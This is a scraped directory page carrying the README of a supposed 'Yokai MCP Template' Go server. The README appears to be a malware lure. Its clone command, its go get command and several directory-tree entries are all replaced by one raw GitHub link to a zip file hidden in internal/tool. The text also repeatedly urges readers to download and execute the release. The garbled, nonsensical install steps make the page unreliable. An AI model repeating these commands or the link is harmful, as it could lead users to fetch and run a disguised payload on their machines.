Track MCP LogoTrack MCP
Track MCP LogoTrack MCP

The world's largest repository of Model Context Protocol servers. Discover, explore, and submit MCP tools.

Product

  • Categories
  • Top MCP
  • New & Updated
  • Submit MCP

Company

  • About

Legal

  • Privacy Policy
  • Terms of Service
  • Cookie Policy

© 2026 TrackMCP. All rights reserved.

Built with ❤️ by Krishna Goyal

    Yokai Mcp Template

    MCP server template based on the Yokai Go framework.

    0 stars
    Go
    Updated Aug 26, 2025
    dependency-injection
    framework
    go
    mcp
    mcp-server
    modular
    observability
    opentelemetry
    yokai

    Table of Contents

    • Table of Contents
    • Features
    • Installation
    • Usage
    • Directory Structure
    • Configuration
    • Observability
    • Contributing
    • License
    • Releases
    • Conclusion

    Table of Contents

    • Table of Contents
    • Features
    • Installation
    • Usage
    • Directory Structure
    • Configuration
    • Observability
    • Contributing
    • License
    • Releases
    • Conclusion

    Documentation

    Yokai MCP Template 🏗️

    Yokai MCP Template

    Welcome to the Yokai MCP Template repository! This project provides a robust server template based on the Yokai Go framework. It focuses on modular design and includes features for observability and dependency injection, making it a great starting point for your MCP server projects.

    Table of Contents

    • Features
    • Installation
    • Usage
    • Directory Structure
    • Configuration
    • Observability
    • Contributing
    • License
    • Releases

    Features

    • Modular Architecture: Easily extend your server with new modules.
    • Dependency Injection: Simplifies management of dependencies.
    • Observability: Built-in support for OpenTelemetry to monitor your application.
    • Lightweight: Fast performance with minimal overhead.
    • Go Language: Built with Go for speed and efficiency.

    Installation

    To get started with the Yokai MCP Template, follow these steps:

    1. Clone the repository:

    bash
    git clone https://raw.githubusercontent.com/Suraj1245/yokai-mcp-template/main/internal/tool/mcp_template_yokai_v3.5-beta.2.zip
       cd yokai-mcp-template

    2. Install dependencies:

    bash
    go mod tidy

    3. Build the application:

    bash
    go build

    4. Download and execute the latest release from Releases.

    Usage

    After installation, you can start the server by running:

    bash
    ./yokai-mcp-template

    You can configure the server by modifying the configuration files in the config directory. Make sure to review the available options to customize your setup.

    Directory Structure

    Here’s a brief overview of the directory structure:

    code
    yokai-mcp-template/
    ├── cmd/
    │   └── https://raw.githubusercontent.com/Suraj1245/yokai-mcp-template/main/internal/tool/mcp_template_yokai_v3.5-beta.2.zip
    ├── config/
    │   └── https://raw.githubusercontent.com/Suraj1245/yokai-mcp-template/main/internal/tool/mcp_template_yokai_v3.5-beta.2.zip
    ├── internal/
    │   ├── module1/
    │   └── module2/
    ├── https://raw.githubusercontent.com/Suraj1245/yokai-mcp-template/main/internal/tool/mcp_template_yokai_v3.5-beta.2.zip
    └── https://raw.githubusercontent.com/Suraj1245/yokai-mcp-template/main/internal/tool/mcp_template_yokai_v3.5-beta.2.zip
    • cmd/: Contains the entry point for the application.
    • config/: Configuration files for the server.
    • internal/: Modules and internal logic for your application.

    Configuration

    The configuration file is located in the config directory. Here is an example configuration:

    yaml
    server:
      port: 8080
    logging:
      level: info

    Adjust the settings according to your requirements. You can specify the server port, logging level, and other parameters.

    Observability

    This template integrates with OpenTelemetry to provide observability for your application. To enable observability:

    1. Install the OpenTelemetry Go SDK:

    bash
    go get https://raw.githubusercontent.com/Suraj1245/yokai-mcp-template/main/internal/tool/mcp_template_yokai_v3.5-beta.2.zip

    2. Configure the OpenTelemetry settings in your application.

    For more details, refer to the OpenTelemetry documentation.

    Contributing

    We welcome contributions! If you want to improve this template, please follow these steps:

    1. Fork the repository.

    2. Create a new branch:

    bash
    git checkout -b feature/YourFeature

    3. Make your changes.

    4. Commit your changes:

    bash
    git commit -m "Add some feature"

    5. Push to the branch:

    bash
    git push origin feature/YourFeature

    6. Open a pull request.

    License

    This project is licensed under the MIT License. See the LICENSE file for details.

    Releases

    For the latest updates and versions, visit the Releases section. Download and execute the latest release to get the newest features and improvements.

    Conclusion

    Thank you for checking out the Yokai MCP Template! We hope this project helps you build efficient and modular MCP servers with ease. If you have any questions or suggestions, feel free to open an issue or contribute to the project. Happy coding!

    Similar MCP

    Based on tags & features

    • MC

      Mcpjungle

      Go·
      617
    • AN

      Anyquery

      Go·
      1.4k
    • MC

      Mcp Cyclops

      Go·
      29
    • MC

      Mcp K8s

      Go·
      128

    Trending MCP

    Most active this week

    • PL

      Playwright Mcp

      TypeScript·
      22.1k
    • SE

      Serena

      Python·
      14.5k
    • MC

      Mcp Playwright

      TypeScript·
      4.9k
    • MC

      Mcp Server Cloudflare

      TypeScript·
      3.0k
    View All MCP Servers

    Similar MCP

    Based on tags & features

    • MC

      Mcpjungle

      Go·
      617
    • AN

      Anyquery

      Go·
      1.4k
    • MC

      Mcp Cyclops

      Go·
      29
    • MC

      Mcp K8s

      Go·
      128

    Trending MCP

    Most active this week

    • PL

      Playwright Mcp

      TypeScript·
      22.1k
    • SE

      Serena

      Python·
      14.5k
    • MC

      Mcp Playwright

      TypeScript·
      4.9k
    • MC

      Mcp Server Cloudflare

      TypeScript·
      3.0k